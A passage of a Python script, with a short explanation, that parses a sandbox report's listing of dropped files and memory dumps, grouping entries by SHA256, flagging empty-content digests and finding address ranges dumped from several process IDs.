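memory/5104-162-0x0000000000000000-mapping.dmp
"""

def _parse_record(lines):
    """One flattened entry -> dict with path, size, hashes and (for dumps) pid/range."""
    head, rest = lines[0], lines[1:]
    rec = {"path": head, "size": None, "hashes": {}}
    if head.endswith("Filesize") and rest:     # "<path>Filesize", size on the next line
        rec["path"], rec["size"], rest = head[:-8], rest[0], rest[1:]
    elif head.endswith("MD5") and rest:        # no size: "<path>MD5", bare digest next
        rec["path"], rec["hashes"]["MD5"], rest = head[:-3], rest[0].lower(), rest[1:]
    for line in rest:                          # remaining lines: "<label><hex>"
        m = HASH_LINE.match(line)
        if not m or len(m.group(2)) != DIGEST_LEN[m.group(1)]:
            raise ValueError(f"unrecognised line in {rec['path']!r}: {line!r}")
        rec["hashes"][m.group(1)] = m.group(2).lower()
    mm = MEMORY_NAME.match(rec["path"])
    rec["kind"] = "file" if not mm else ("memory" if mm.group("end") else "mapping")
    if mm:
        rec["pid"], rec["start"] = int(mm.group("pid")), int(mm.group("start"), 16)
        rec["end"] = int(mm.group("end"), 16) if mm.group("end") else None
    return rec

def parse_listing(text):
    """Split the listing on lone '-' separators and parse each entry."""
    records, block = [], []
    for line in text.splitlines() + ["-"]:
        if line.strip() == "-":
            if block:
                records.append(_parse_record(block))
            block = []
        elif line.strip():
            block.append(line.strip())
    return records

def files_by_sha256(records):
    """Collapse repeated drops of the same content: sha256 -> path and count."""
    out = {}
    for r in records:
        sha = r["hashes"].get("SHA256")
        if r["kind"] == "file" and sha:
            out.setdefault(sha, {"path": r["path"], "count": 0})["count"] += 1
    return out

def empty_content_entries(records):
    """Paths whose digests are those of zero-length input."""
    return [r["path"] for r in records
            if r["hashes"].get("MD5") == EMPTY_MD5
            or r["hashes"].get("SHA256") == EMPTY_SHA256]

def shared_regions(records):
    """(start, end) -> sorted PIDs from which exactly that range was dumped."""
    seen = defaultdict(set)
    for r in records:
        if r["kind"] == "memory":
            seen[(r["start"], r["end"])].add(r["pid"])
    return {k: sorted(v) for k, v in seen.items()}

if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for sha, e in files_by_sha256(recs).items():
        print(f"{e['count']}x {e['path']}  sha256={sha}")
    print("empty-content entries:", empty_content_entries(recs))
    for (s, e), pids in shared_regions(recs).items():
        print(f"0x{s:X}-0x{e:X} ({e - s} bytes) dumped from PIDs {pids}")
```

The range 0x00007FF7F49D0000-0x00007FF7F58F4000 works out to 15,876,096 bytes, which is the 15.1MB the report shows, and on the full listing it is the one range that recurs across PIDs 2864, 4336 and 1304; dedupe by digest rather than by path, since the same path written several times may carry different content on a later run.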